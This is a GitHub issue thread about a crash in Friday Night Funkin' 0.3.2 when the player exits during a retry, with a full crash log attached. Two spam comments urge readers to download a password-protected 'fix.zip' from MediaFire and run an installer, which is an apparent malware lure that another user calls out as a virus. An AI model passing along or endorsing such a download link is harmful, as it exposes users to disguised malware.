### ISSUE TITLE
Crash: Entering song while returning to menu

### ISSUE THREAD

**Issue by Beelijah** [FunkinCrew/Funkin#3125]
### Issue Checklist

- [X] I have properly named the issue
- [X] I have checked the issues/discussions pages to see if the issue has been previously reported

### What platform are you using?

Itch.io (Downloadable Build) - Windows

### If you are playing on a browser, which one are you using?

None

### Version

0.3.2

### Context (Provide screenshots or videos of the crash happening)

# The Bug

basically, you die, retry, and go back straight before the game loads the notes and characters etc etc.

### Steps to reproduce

1. Die (lol)
2. Press enter.
3. While it's fading out, press ESC or backspace
4. crash

### Crash logs (can be found in the logs folder where Funkin.exe is)

=====================
 Funkin Crash Report
=====================

Generated by: Friday Night Funkin' - v0.3.2
  Git hash: ab3fd65 (CLEAN)
System timestamp: 2024-08-27-17-27-55
Driver info: OpenGL Vendor=NVIDIA Corporation Version=4.6.0 NVIDIA 560.81 Renderer=NVIDIA GeForce RTX 4060/PCIe/SSE2 GLSL=4.60 NVIDIA
Platform: Windows
Render method: DRAW_TILES

=====================

HXCPP-Immix:
- Memory Used: 920119272 bytes
- Memory Reserved: 979609704 bytes
- Memory Current Pool: 920123752 bytes
- Memory Large Pool: 892932712 bytes
- HXCPP Debugger: Disabled
- HXCPP Exp Generational Mode: Disabled
- HXCPP Exp Moving GC: Disabled
- HXCPP Exp Moving GC: Disabled
- HXCPP Exp Moving GC: Disabled
- HXCPP Debug Link: Disabled
- HXCPP Stack Trace: Enabled
- HXCPP Stack Trace Line Numbers: Enabled
- HXCPP Pointer Validation: Enabled
- HXCPP Profiler: Disabled
- HXCPP Local Telemetry: Disabled
- HXCPP C++11: Disabled
- Source Annotation: Disabled

=====================

Flixel Current State: funkin.play.PlayState

=====================

Haxelibs: 
- discord_rpc git(https://github.com/Aidan63/linc_discord-rpc/:2d83fa863ef0c1eace5f1cf67c3ac315d1a3a8a5
- flixel git(https://github.com/FunkinCrew/flixel/:a7d8e3bad89a0a3506a4714121f73d8e34522c49
- flixel-addons git(https://github.com/FunkinCrew/flixel-addons/:a523c3b56622f0640933944171efed46929e360e
- flixel-text-input haxelib(1.1.0)
- flixel-ui git(https://github.com/HaxeFlixel/flixel-ui/:719b4f10d94186ed55f6fef1b6618d32abec8c15
- flxanimate git(https://github.com/FunkinCrew/flxanimate/:17e0d59fdbc2b6283a5c0e4df41f1c7f27b71c49
- format haxelib(3.5.0)
- funkin.vis git(https://github.com/FunkinCrew/funkVis/:98c9db09f0bbfedfe67a84538a5814aaef80bdea
- hamcrest haxelib(3.0.0)
- haxeui-core git(https://github.com/haxeui/haxeui-core/:0212d8fdfcafeb5f0d5a41e1ddba8ff21d0e183b
- haxeui-flixel git(https://github.com/haxeui/haxeui-flixel/:63a906a6148958dbfde8c7b48d90b0693767fd95
- hscript haxelib(2.5.0)
- hxCodec git(https://github.com/FunkinCrew/hxCodec/:c0c7f2680cc190c932a549c2e2fdd9b0ba2bd10e
- hxcpp haxelib(4.3.2)
- hxcpp-debug-server git(https://github.com/FunkinCrew/hxcpp-debugger/hxcpp-debug-server:147294123f983e35f50a966741474438069a7a8f
- hxp haxelib(1.2.2)
- json2object git(https://github.com/FunkinCrew/json2object/:a8c26f18463c98da32f744c214fe02273e1823fa
- lime git(https://github.com/FunkinCrew/lime/:872ff6db2f2d27c0243d4ff76802121ded550dd7
- mconsole git(https://github.com/massive-oss/mconsole/:06c0499ed8f80628a0e6e55ffa32c3cbd688a838
- mcover git(https://github.com/massive-oss/mcover/src:c3c47cd682b0b202a41caee95321989391b617ef
- mockatoo git(https://github.com/FunkinCrew/mockatoo/src:13d77a0a8eaf5e789ef5dae6cd33eee812deda36
- munit git(https://github.com/FunkinCrew/MassiveUnit/src:f61be7f7ba796595f45023ca65164a485aba0e7e
- openfl git(https://github.com/FunkinCrew/openfl/:228c1b5063911e2ad75cef6e3168ef0a4b9f9134
- polymod git(https://github.com/larsiusprime/polymod/:8553b800965f225bb14c7ab8f04bfa9cdec362ac
- thx.core git(https://github.com/FunkinCrew/thx.core/:22605ff44f01971d599641790d6bae4869f7d9f4
- thx.semver git(https://github.com/FunkinCrew/thx.semver/:cf8d213589a2c7ce4a59b0fdba9e8ff36bc029fa

=====================

Loaded mods: 
No mods loaded.

=====================

Null Object Reference
  in funkin/ui/transition/StickerSubState.hx#236
  in flixel/util/FlxTimer.hx#205
  in flixel/util/FlxTimer.hx#295
  in flixel/FlxGame.hx#748
  in flixel/FlxGame.hx#680
  in flixel/FlxGame.hx#559
  in openfl/events/EventDispatcher.hx#402
  in openfl/display/DisplayObject.hx#1399

**Comment by Beelijah** [comment]
ill add a clip soon, busy rn sry

**Comment by JVNpixels** [comment]
Update your Funkin' to the latest version, (0.4.1) unless you are doing something intentional with an outdated version of Funkin'

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AbnormalPoof** [comment]
> Download
[Link removed]
password: changeme
In the installer menu, select "gcc."

nice virus lol

**Comment by Beelijah** [comment]
im going to test it with 0.4.1 executable, hold on:

nope, didn't work! im marking this as closed now.

**Comment by Beelijah** [comment]
also yeah, abnormalpoof, nice catch. literally any zip or any compressed archive that requires a password is unsafe. lol

thanks for pointing it out for those who are smol bran like me 4 years ago
